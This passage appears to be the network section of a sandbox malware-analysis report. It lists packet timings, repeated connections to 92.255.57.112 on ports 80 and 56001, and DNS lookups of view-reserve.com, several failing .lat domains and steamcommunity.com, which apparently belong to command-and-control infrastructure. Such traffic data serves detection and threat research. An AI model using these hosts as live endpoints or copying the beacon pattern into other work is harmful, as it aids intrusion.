                                                                                                                                                                                                Jan 15, 2025 10:09:10.742276907 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742290020 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742301941 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742305994 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742319107 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742336988 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742338896 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742350101 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742362022 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742362976 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742373943 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742387056 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742389917 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742413998 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742455959 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742470026 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742482901 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742496014 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742512941 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742535114 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742547989 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742563009 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742577076 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742580891 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742590904 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742609024 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742650986 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742662907 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742676973 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742686033 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742692947 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742721081 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742721081 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742753029 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742763996 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742775917 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742786884 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742794037 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742794037 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742827892 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742839098 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742851973 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742865086 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742880106 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742885113 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742932081 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742932081 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742945910 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742960930 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742974997 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742996931 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743021965 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743050098 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743062019 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743068933 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743076086 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743088007 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743097067 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743100882 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743108988 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743120909 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743133068 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743139029 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743145943 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743160963 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743164062 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743202925 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743278980 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743303061 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.743354082 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.802483082 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.944587946 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:11.418114901 CET4970980192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:11.799338102 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:11.872390032 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:12.012504101 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.012557983 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:12.012689114 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.014714956 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.014729023 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:12.652141094 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:12.652232885 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.665676117 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.665693998 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:12.666114092 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:12.797435999 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.822175980 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:12.863333941 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234555006 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234586000 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234596968 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234611034 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234639883 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234724998 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234743118 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234783888 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.234842062 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.323839903 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.323868990 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.323915958 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.324007034 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.324033022 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.324081898 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.461962938 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.461993933 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:13.462013960 CET49711443192.168.2.5104.102.49.254
                                                                                                                                                                                                Jan 15, 2025 10:09:13.462019920 CET44349711104.102.49.254192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:17.619434118 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:17.624413967 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:17.624509096 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:17.626333952 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:17.631072998 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:17.638324976 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:17.643110037 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:18.333168030 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:18.333194017 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:18.333256006 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:18.340828896 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:18.345633030 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:18.560091019 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:18.688024998 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:20.404202938 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:20.409146070 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:20.409199953 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:20.413985968 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:35.714817047 CET5133853192.168.2.5162.159.36.2
                                                                                                                                                                                                Jan 15, 2025 10:09:35.719657898 CET5351338162.159.36.2192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:35.722264051 CET5133853192.168.2.5162.159.36.2
                                                                                                                                                                                                Jan 15, 2025 10:09:35.727142096 CET5351338162.159.36.2192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:36.185523987 CET5133853192.168.2.5162.159.36.2
                                                                                                                                                                                                Jan 15, 2025 10:09:36.190669060 CET5351338162.159.36.2192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:36.190732002 CET5133853192.168.2.5162.159.36.2
                                                                                                                                                                                                Jan 15, 2025 10:09:53.749820948 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:53.754789114 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:53.754848957 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:53.759778976 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:54.135910034 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:54.188050032 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:54.303441048 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:54.309675932 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:54.314552069 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:54.314623117 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:54.319436073 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:27.735605955 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:27.740525007 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:27.740598917 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:27.745465040 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:28.119249105 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:28.172410965 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:28.288661957 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:28.290431976 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:28.295469999 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:28.295536041 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:28.300841093 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:48.735496044 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:48.740717888 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:48.740784883 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:48.745758057 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:49.127960920 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:49.172563076 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:49.305294991 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:49.307492971 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:49.312427998 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:49.312504053 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:49.317301989 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:55.658353090 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:55.663175106 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:55.663264990 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:55.668040037 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:56.042112112 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:56.094346046 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:56.210771084 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:56.212486982 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:56.217428923 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:56.217530966 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:56.222419977 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:59.141661882 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:59.146678925 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:59.146744013 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:59.151537895 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:59.523603916 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:59.578675985 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:59.695359945 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:59.698133945 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:59.703141928 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:10:59.704495907 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:10:59.709379911 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:01.532773018 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:01.537619114 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:01.537736893 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:01.542583942 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:01.913475990 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:01.954361916 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:02.086221933 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:02.090383053 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:02.095427990 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:02.095558882 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:02.100488901 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:05.391619921 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:05.396707058 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:05.398430109 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:05.403285027 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:05.776485920 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:05.828708887 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:05.945557117 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:05.950083971 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:05.955040932 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:05.958458900 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:05.963342905 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:06.892081022 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:06.897064924 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:06.897149086 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:06.901938915 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:07.281488895 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:07.328692913 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:07.445544004 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:07.500593901 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:12.429826975 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:12.434767008 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:12.434839964 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:12.439631939 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:12.821510077 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:12.875658035 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:12.992521048 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:12.993359089 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:12.998217106 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:11:12.998282909 CET4971456001192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:11:13.003675938 CET560014971492.255.57.112192.168.2.5
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Jan 15, 2025 10:09:04.763365030 CET6155853192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:04.776556969 CET53615581.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.832910061 CET5038353192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.841844082 CET53503831.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.848853111 CET5785353192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.861773968 CET53578531.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.867321014 CET5673453192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.876137018 CET53567341.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.887607098 CET6475553192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.896608114 CET53647551.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.898821115 CET5797453192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.910700083 CET53579741.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.913321972 CET6310153192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.922133923 CET53631011.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.932327986 CET5872053192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.941157103 CET53587201.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.948086977 CET6452953192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.960304022 CET53645291.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.980268002 CET5809053192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:11.989171028 CET53580901.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:11.995567083 CET5695953192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:12.002445936 CET53569591.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:35.710803032 CET5356431162.159.36.2192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:36.225261927 CET5402453192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:36.232635021 CET53540241.1.1.1192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:39.168178082 CET5994953192.168.2.51.1.1.1
                                                                                                                                                                                                Jan 15, 2025 10:09:39.175405025 CET53599491.1.1.1192.168.2.5
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Jan 15, 2025 10:09:04.763365030 CET192.168.2.51.1.1.10x2389Standard query (0)view-reserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.832910061 CET192.168.2.51.1.1.10xf108Standard query (0)curtainykeo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.848853111 CET192.168.2.51.1.1.10x2e88Standard query (0)bloodyswif.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.867321014 CET192.168.2.51.1.1.10xef5Standard query (0)washyceehsu.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.887607098 CET192.168.2.51.1.1.10xe721Standard query (0)leggelatez.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.898821115 CET192.168.2.51.1.1.10xba8bStandard query (0)miniatureyu.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.913321972 CET192.168.2.51.1.1.10x2a21Standard query (0)kickykiduz.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.932327986 CET192.168.2.51.1.1.10xe773Standard query (0)savorraiykj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.948086977 CET192.168.2.51.1.1.10xdd38Standard query (0)shoefeatthe.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.980268002 CET192.168.2.51.1.1.10x5043Standard query (0)finickypwk.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.995567083 CET192.168.2.51.1.1.10x5b32Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:36.225261927 CET192.168.2.51.1.1.10x7411Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:39.168178082 CET192.168.2.51.1.1.10xacccStandard query (0)56.163.245.4.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Jan 15, 2025 10:09:04.776556969 CET1.1.1.1192.168.2.50x2389No error (0)view-reserve.com92.255.57.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.841844082 CET1.1.1.1192.168.2.50xf108Name error (3)curtainykeo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.861773968 CET1.1.1.1192.168.2.50x2e88Name error (3)bloodyswif.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.876137018 CET1.1.1.1192.168.2.50xef5Name error (3)washyceehsu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.896608114 CET1.1.1.1192.168.2.50xe721Name error (3)leggelatez.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.910700083 CET1.1.1.1192.168.2.50xba8bName error (3)miniatureyu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.922133923 CET1.1.1.1192.168.2.50x2a21Name error (3)kickykiduz.latnonenoneA (IP address)IN (0x0001)false
